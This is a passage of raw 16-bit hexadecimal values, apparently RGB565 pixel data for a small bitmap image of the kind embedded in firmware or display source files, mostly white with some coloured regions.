0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x73af, 0x4a6a, 0x426a, 0x3a29, 0x39e8, 0x5aec, 0x5aec, 0x52cc, 0x4aab, 0x4a8a, 0x39c7, 0xce9a, 0xffff, 0xffff, 0xf77d, 0x3a49, 0x3aad, 0x32ef, 0x23f6, 0x1c17, 0x2458, 0x24b9, 0x2cfa, 0x2d3b, 0x357c, 0x3d9c, 0x45fd, 0x4dfd, 0x4e1d, 0x563e, 0x563d, 0x563d, 0x563d, 0x563d, 0x5e3e, 0x5e5e, 0x663e, 0x5e3d, 0x5e3d, 0x5e3d, 0x5e1d, 0x5e1d, 0x55fd, 0x55dd, 0x4dbd, 0x459c, 0x3d7c, 0x353c, 0x2cfb, 0x2cfb, 0x249c, 0x245b, 0x243a, 0x143a, 0x0c3a, 0x13f9, 0x1bb8, 0x1bb8, 0x13b8, 0x2396, 0x19eb, 0x0021, 0x73ae, 0xf7ff, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x52aa, 0xef5d, 0xce7a, 0xce7b, 0xce5a, 0xd6bb, 0x5acc, 0x5b0e, 0x530d, 0xbe7a, 0x4b0c, 0x426b, 0x73f1, 0x94b5, 0x426b, 0x324b, 0x6412, 0x6bb2, 0x426d, 0x3a4d, 0x5330, 0x4aef, 0x4ace, 0x29cb, 0x5b52, 0x3a6d, 0x5350, 0x1988, 0x5330, 0x5b93, 0x63d4, 0x42ae, 0x84b5, 0xb5d7, 0xce5a, 0xffdf, 0xfffe, 0xfffd, 0x9c92, 0x83ef, 0xc736, 0x6d6a, 0x6d4b, 0xbed8, 0xe7bd, 0x6cec, 0x75eb, 0x858d, 0xcefa, 0x9492, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x73af, 0x4229, 0x3a29, 0x31c7, 0x31a7, 0x52cb, 0x52cb, 0x4aab, 0x4a8a, 0x4a69, 0x31a7, 0xce7a, 0xffff, 0xffff, 0xf79d, 0x3a49, 0x32ad, 0x2acf, 0x1bd6, 0x1bf7, 0x2418, 0x2459, 0x249a, 0x2cdb, 0x2d1c, 0x355c, 0x3d7d, 0x3d9d, 0x45dd, 0x4ddd, 0x4dfd, 0x4dfd, 0x4dfd, 0x4dfd, 0x55fd, 0x55fd, 0x55fd, 0x55fd, 0x55fd, 0x55fd, 0x55dc, 0x4ddc, 0x4dbc, 0x4d9c, 0x457c, 0x3d5c, 0x353b, 0x34fb, 0x2cda, 0x24ba, 0x1c7b, 0x241a, 0x23f9, 0x13f9, 0x0c19, 0x13d8, 0x1b98, 0x1398, 0x13b8, 0x2395, 0x19eb, 0x0000, 0x73ae, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x52aa, 0xd71d, 0xbe5a, 0xc69c, 0xe7bf, 0xdf7f, 0xbe7c, 0x8494, 0xc67b, 0xdf3d, 0x9d76, 0x84d4, 0xbe7c, 0xbebd, 0x9577, 0x9536, 0xa5b7, 0xa5fb, 0x7454, 0x7c96, 0x9578, 0x8d37, 0x5bb1, 0x5bd2, 0x7475, 0x6c34, 0x5bd1, 0x5bb0, 0x63f2, 0x6c13, 0x63b2, 0x5bb1, 0x84d4, 0xad97, 0xd67a, 0xffbf, 0xffdf, 0xffff, 0xa4f4, 0x7c0e, 0x9e31, 0x2be4, 0x1b84, 0x9e54, 0xd7da, 0x4426, 0x2402, 0x54a7, 0xc715, 0x9472, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x6b6e, 0x39e8, 0x29c8, 0x2986, 0x2966, 0x4a8a, 0x4aab, 0x4a8a, 0x4a6a, 0x4a49, 0x2966, 0xce79, 0xffff, 0xffff, 0xef7d, 0x3a08, 0x328c, 0x32ef, 0x23b6, 0x23b7, 0x23f7, 0x2418, 0x2459, 0x2c7a, 0x2cbb, 0x2cdb, 0x351c, 0x3d3c, 0x455c, 0x457d, 0x4d9d, 0x4d9c, 0x4d9c, 0x4d9c, 0x4d9b, 0x4dbc, 0x4dbc, 0x4dbc, 0x4dbc, 0x4dbc, 0x4d9c, 0x4d9c, 0x455b, 0x455b, 0x3d3b, 0x3d1b, 0x34fa, 0x2cba, 0x2499, 0x2479, 0x1c39, 0x1bf8, 0x23d8, 0x13d8, 0x0bf8, 0x13d7, 0x1397, 0x1398, 0x0bb7, 0x2395, 0x19eb, 0x0000, 0x73ae, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x5acb, 0xcf1e, 0xadfa, 0xb69d, 0x8558, 0x6453, 0x9dfa, 0xc71e, 0x8d16, 0x6bd1, 0xb65b, 0xc73f, 0x64b6, 0x4392, 0xa65c, 0xae7b, 0x8cf5, 0x6434, 0xa65c, 0x8d79, 0x7cf7, 0x6433, 0x9e1b, 0x8538, 0x8d79, 0x6c74, 0x8d57, 0x7cf5, 0x8d57, 0x5bd2, 0x7cb5, 0x5bb0, 0x8d56, 0xadd7, 0xce7a, 0xffff, 0xffdf, 0xffff, 0x94b3, 0x7c2d, 0x8e50, 0x34e8, 0x452a, 0x8631, 0xcff8, 0x3446, 0x666c, 0x44c7, 0xb713, 0x8c51, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x634d, 0x31a7, 0x2187, 0x1925, 0x2125, 0x4a8a, 0x4a8a, 0x4269, 0x4249, 0x4249, 0x2965, 0xce9a, 0xffff, 0xffff, 0xf77d, 0x3208, 0x2a4c, 0x32ef, 0x2396, 0x2396, 0x23b6, 0x23f8, 0x2439, 0x2439, 0x245a, 0x247a, 0x2cba, 0x34db, 0x34fb, 0x34fa, 0x453b, 0x453b, 0x3cfa, 0x453b, 0x3d5b, 0x457b, 0x457b, 0x457b, 0x457b, 0x457b, 0x455b, 0x3d5b, 0x3d3b, 0x3d1b, 0x34fb, 0x2c99, 0x2cda, 0x2479, 0x2459, 0x1c39, 0x1419, 0x1bd8, 0x1bb8, 0x13b7, 0x0bf8, 0x13b7, 0x1377, 0x0b98, 0x0397, 0x1bb5, 0x11aa, 0x0001, 0x738e, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x52aa, 0xcede, 0xae1b, 0xbebc, 0x00e6, 0x0106, 0x226c, 0xae5c, 0x530e, 0x0043, 0x7453, 0x8579, 0x5c76, 0x4c35, 0x7539, 0x8537, 0x0022, 0x0107, 0x95b9, 0x5bb1, 0x5bd1, 0x32ad, 0x8538, 0x6454, 0xb6be, 0x53b1, 0x74b5, 0x6453, 0xd7bf, 0x6454, 0x5c32, 0x6432, 0x8d77, 0xa5d6, 0xce7a, 0xffff, 0xffff, 0xffff, 0xa533, 0x744c, 0xaf73, 0x5e6b, 0x560b, 0xaf74, 0xcff8, 0x65ec, 0x5e6c, 0x764e, 0xbf14, 0x8c31, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x632d, 0x2966, 0x1966, 0x2166, 0x1924, 0x4229, 0x4249, 0x4249, 0x4229, 0x39e8, 0x2145, 0xc659, 0xffff, 0xffff, 0xf79d, 0x39e8, 0x324b, 0x2aae, 0x1396, 0x1396, 0x13b6, 0x1bd7, 0x1bf8, 0x1c19, 0x1c39, 0x1c5a, 0x249a, 0x1c79, 0x2cdb, 0x2cba, 0x2cba, 0x34da, 0x34fb, 0x34fb, 0x353b, 0x353c, 0x353c, 0x353c, 0x353c, 0x353c, 0x353c, 0x351c, 0x2cfb, 0x2cdb, 0x24ba, 0x249a, 0x249a, 0x1c5a, 0x1439, 0x1439, 0x0bf8, 0x13b8, 0x1b98, 0x1397, 0x0b97, 0x1397, 0x1357, 0x0b78, 0x0b97, 0x1b74, 0x11cb, 0x0002, 0x736e, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0x5acb, 0xcedd, 0xb5f9, 0xb639, 0x5b8e, 0x8d15, 0x6c11, 0xc6bc, 0x8cf5, 0x9d57, 0x8cd5, 0xa5da, 0x7475, 0x74d7, 0x8d79, 0xa619, 0x7c92, 0x7c94, 0xae19, 0x9555, 0xb659, 0x8d15, 0xae1b, 0x9558, 0x7473, 0x7473, 0xae1a, 0x7c95, 0xa5fa, 0x7495, 0x9598, 0x8516, 0xa61a, 0xa5b5, 0xce9a, 0xffff, 0xffff, 0xfffe, 0x9cf2, 0x742c, 0x8e8f, 0x24c3, 0x1c83, 0x8e91, 0xcff9, 0x2bc4, 0x2484, 0x4ce8, 0xbed5, 0x8410, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0x5b0c, 0x1925, 0x1925, 0x1905, 0x10e3, 0x3a08, 0x4249, 0x3a08, 0x3a08, 0x3a08, 0x1924, 0xc659, 0xffff, 0xffff, 0xf77d, 0x39e8, 0x322a, 0x32ae, 0x1396, 0x1396, 0x13b7, 0x13d7, 0x13d8, 0x0bf8, 0x1418, 0x1439, 0x1459, 0x1438, 0x1c59, 0x1c79, 0x2499, 0x24ba, 0x2499, 0x24ba, 0x2cdb, 0x2cdb, 0x2cfb, 0x2cfb, 0x2cfc, 0x2cfb, 0x2cfb, 0x24db, 0x24bb, 0x24bb, 0x1c9a, 0x1c7a, 0x1439, 0x143a, 0x1419, 0x0bf9, 0x13d8, 0x1bb8, 0x1b77, 0x1377, 0x1376, 0x1376, 0x1357, 0x0b56, 0x1396, 0x2373, 0x11ab, 0x0002, 0x7bb0, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x528a, 0xdf3f, 0xbe3a, 0xceba, 0x634d, 0x5b2d, 0x5b2d, 0xbe5a, 0x5b0d, 0x52cc, 0x634e, 0xbe19, 0x4a8c, 0x52cd, 0x8453, 0xce9a, 0x636c, 0x5b2d, 0x9514, 0x9513, 0x4aeb, 0x428b, 0x6bf1, 0x530e, 0x3a6a, 0x29e8, 0x6bd0, 0x428d, 0x320a, 0x31c9, 0x6b90, 0x5b0e, 0x94b5, 0xa594, 0xd699, 0xffdf, 0xffff, 0xffff, 0x9cd3, 0x7c4e, 0x9690, 0x4de9, 0x4569, 0x8e72, 0xd7fa, 0x2be5, 0x4568, 0x4ce8, 0xbed5, 0x7bcf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0x52aa, 0x10e3, 0x08e4, 0x10e4, 0x18e4, 0x39e7, 0x3a08, 0x31e8, 0x3a08, 0x31c7, 0x1904, 0xc67a, 0xf7df, 0xffff, 0xff9d, 0x31c7, 0x29e9, 0x32ad, 0x1b94, 0x1b94, 0x1b95, 0x1bb5, 0x1bb6, 0x1bb6, 0x1bd6, 0x23f7, 0x2417, 0x2437, 0x2437, 0x2437, 0x2c58, 0x2c57, 0x2c57, 0x3499, 0x3498, 0x3499, 0x34b9, 0x3cb9, 0x3cb9, 0x3cb9, 0x3499, 0x3498, 0x3498, 0x3478, 0x2c37, 0x2417, 0x23f7, 0x23f7, 0x23d7, 0x23d7, 0x23b6, 0x2396, 0x2376, 0x2375, 0x2374, 0x2354, 0x2355, 0x1b54, 0x2394, 0x3372, 0x1189, 0x0002, 0x6b6e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x52aa, 0xd71e, 0xb5f8, 0xb5f8, 0xb5f8, 0xa577, 0xdf1d, 0xef9f, 0xb5f8, 0x9cf5, 0xd6dc, 0xdefc, 0x9d14, 0x8431, 0xa515, 0x9cf4, 0x5b2c, 0x530e, 0x6bf0, 0x63ae, 0x3a6a, 0x320a, 0x4ace, 0x3a4b, 0x21a8, 0x29a8, 0x3a2a, 0x39ea, 0x3168, 0x2967, 0x39c8, 0x2905, 0x6aed, 0xb5f6, 0xd699, 0xffdf, 0xffff, 0xffff, 0x9cb3, 0x7c0e, 0xa714, 0x55cb, 0x55ab, 0x9f34, 0xcff9, 0x65ac, 0x6e8d, 0x6e0d, 0xaeb3, 0x73ae, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
